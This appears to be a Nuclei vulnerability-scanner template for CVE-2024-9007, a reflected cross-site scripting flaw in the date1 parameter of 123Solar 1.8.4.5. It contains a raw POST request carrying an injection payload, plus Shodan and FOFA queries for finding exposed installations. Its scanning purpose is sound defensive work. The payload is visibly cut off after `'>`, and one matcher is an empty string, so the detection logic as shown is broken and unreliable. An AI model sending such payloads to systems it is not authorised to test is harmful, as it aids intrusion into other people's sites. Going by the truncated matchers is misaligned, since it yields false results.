id: CVE-2024-9007

info:
  name: 123Solar 1.8.4.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    123Solar 1.8.4.5 is vulnerable to reflected cross-site scripting (XSS) via the date1 parameter in detailed.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
  remediation: |
    Update 123Solar to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the date1 parameter in detailed.php.
  reference:
    - https://github.com/Hebing123/cve/issues/73
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9007
  classification:
    epss-score: 0.00931
    epss-percentile: 0.56056
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-9007
    cwe-id: CWE-79
    cpe: cpe:2.3:a:123solar:123solar:1.8.4.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 123solar
    product: 123solar
    fofa-query: title="123Solar"
    shodan-query: title:"123Solar"
  tags: cve,cve2024,xss,123solar,vuln

http:
  - raw:
      - |
        POST /123solar/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        date1=01/01/1967'>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on

    payloads:
      path:
        - 'detailed.php'
        - 'indexdetailed.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ""
          - "datepickid"
        condition: and

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b22e099ef342f296922cde474474e1d5248e57f273de0a7410ece53fe2df8b07022039872eab5f347817910bde262c1b204d61bfd1b121d2653165938086bc05f868:922c64590222798bb761d5b6d8e72950